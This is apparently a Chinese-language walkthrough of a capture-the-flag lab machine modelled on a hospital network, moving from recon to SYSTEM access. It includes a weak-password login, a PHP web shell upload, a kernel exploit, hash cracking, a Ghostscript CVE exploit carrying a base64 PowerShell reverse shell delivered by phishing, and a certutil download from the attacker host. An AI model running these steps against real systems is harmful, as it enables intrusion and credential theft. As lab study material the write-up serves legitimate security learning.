靶场信息
- OS:Windows
- 难度:中等
PreEnum
fscan
10.10.11.241:139 open
10.10.11.241:8080 open
10.10.11.241:443 open
10.10.11.241:88 open
10.10.11.241:445 open
10.10.11.241:135 open
10.10.11.241:22 open
[*] NetInfo:
[*]10.10.11.241
[->]DC
[->]192.168.5.1
[->]10.10.11.241
[->]dead:beef::f108:9933:411b:d812
[->]dead:beef::1a0
[*] WebTitle: http://10.10.11.241:8080 code:302 len:0 title:None 跳转url: http://10.10.11.241:8080/login.php
[*] WebTitle: https://10.10.11.241 code:200 len:5379 title:Hospital Webmail :: 欢迎使用 Hospital Webmail
[*] WebTitle: http://10.10.11.241:8080/login.php code:200 len:5739 title:Login
Nmap
# Nmap 7.94 scan initiated Thu Nov 23 10:20:44 2023 as: nmap -sC -sV -v -oN nmap.log 10.10.11.241
Nmap scan report for 10.10.11.241
Host is up (0.47s latency).
Not shown: 980 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_ 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-23 09:23:39Z)
135/tcp open tcpwrapped
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 924A68D347C80D0E502157E83812BB23
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Issuer: commonName=DC.hospital.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-05T18:39:34
| Not valid after: 2024-03-06T18:39:34
| MD5: 0c8a:ebc2:3231:590c:2351:ebbf:4e1d:1dbc
|_SHA-1: af10:4fad:1b02:073a:e026:eef4:8917:734b:f8e3:86a7
| rdp-ntlm-info:
| Target_Name: HOSPITAL
| NetBIOS_Domain_Name: HOSPITAL
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hospital.htb
| DNS_Computer_Name: DC.hospital.htb
| DNS_Tree_Name: hospital.htb
| Product_Version: 10.0.17763
|_ System_Time: 2023-11-23T09:25:11+00:00
8080/tcp open http Apache httpd 2.4.55 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.55 (Ubuntu)
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-23T09:25:07
|_ start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 23 10:26:21 2023 -- 1 IP address (1 host up) scanned in 336.95 seconds
- 443端口https协议,采用Windows64的Apache服务,使用脚本语言PHP8.0.28
- 8080端口http协议,Ubuntu的Apache服务,是个代理
- 三个RPC的端口
- 2103/tcp open msrpc Microsoft Windows RPC
- 2105/tcp open msrpc Microsoft Windows RPC
- 2107/tcp open msrpc Microsoft Windows RPC
user.txt
- Web 443
登录框,有信息显示:Hospital Webmail
。所以这个页面是医院的网络邮件后台 - Web 8080 Upload
登录框,弱口令admin/123456进去。只有一个文件上传的功能点:上传个人病历
文件上传后缀fuzz一下,.phar
和.ps1
可以上传
使用这个PHP shell https://github.com/flozz/p0wny-shell
修改后缀为.phar上传,然后反弹shell
内核漏洞提权 https://github.com/briskets/CVE-2021-3493/tree/main
/etc/shadow中找到一个用户hash
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/
John爆破拿到明文qwe123!@#
这个用户可以登录443端口的医院邮件后台,有一个drbrown的邮件
两个信息:
- .eps文件
- GhostScript可视化
那我们可以做一个钓鱼邮件,放入.eps的shell,用这个工具打
https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
生成一个反弹shell的eps
└─$ python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.14.52 -port 2333 --filename wkrev --extension eps
[+] Generated EPS payload file: wkrev.eps
注入payload:powershell # 3 (base64)
└─$ python3 CVE_2023_36664_exploit.py --inject --payload "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANQAyACIALAAyADMAMwAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --filename revshell.eps
[+] Payload successfully injected into revshell.eps.
发送钓鱼邮件
nc监听拿到shell
拿到user.txt
PS C:\Users\drbrown.HOSPITAL\Desktop> type user.txt
6d70cadfc2a8e88eee3d7df0d0d628f4
Enum4system
这个文件里面好像暴露了明文密码chr!$br0wn
PS C:\Users\drbrown.HOSPITAL\Documents> type ghostscript.bat
@echo off
set filename=%~1
powershell -command "$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospital\drbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"
掌握了drbrown用户和它的明文密码chr!$brOwn
三个RPC端口还没用过,试试rpcclient枚举
└─$ sudo rpcclient -U "drbrown" 10.10.11.241
Password for [WORKGROUP\drbrown]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
那只能回到brown的shell去枚举,在C盘下发现xampp(这是一个集成建站工具,其实就是443端口对应的Web服务),里面有一个htdocs
icacls
查看权限,有NT AUTHORITY\SYSTEM
PS C:\xampp> icacls htdocs
htdocs NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
所以在该文件夹下加入shell,反弹回来的就是系统权限了
Get System
这里上传带GUI的PHPShell文件到htdocs文件夹
PS C:\xampp\htdocs> certutil -urlcache -split -f http://10.10.14.52:8000/wkk.php wkkw.php **** Online **** 0000 ... 3511 CertUtil: -URLCache command completed successfully.
访问https://10.10.11.241/wkkw.php
执行powershell3(base64)反弹shell
拿到SYSTEM权限的shell,域管目录下有root.txt
总结
这台机器仿真一家医院的部分网络业务环境,还是挺有意思的。
1.8080端口代理了一台Ubuntu上的http服务,文件上传拿到www-data权限
2. 内核提权拿到Ubuntu的root权限,在/etc/shadow/
中发现drwilliams
用户的hash,john爆破拿到明文密码
3. 这组用户密码drwilliams/qwe123!@#
可以访问443端口的医院邮件后台,里面有drbrown发来的邮件,问drwilliams要一个eps文件
4. 做一个带有eps格式shell的钓鱼邮件,拿到drbrown的Windows机器(DC),拿到user.txt
5. 在该机器的C盘中发现了XAMPP文件夹,对应443端口的服务。这个文件夹下htdocs文件夹权限是SYSTEM,certutil
下载Kali里有GUI的webshell,执行powershell的反弹shell拿到SYSTEM权限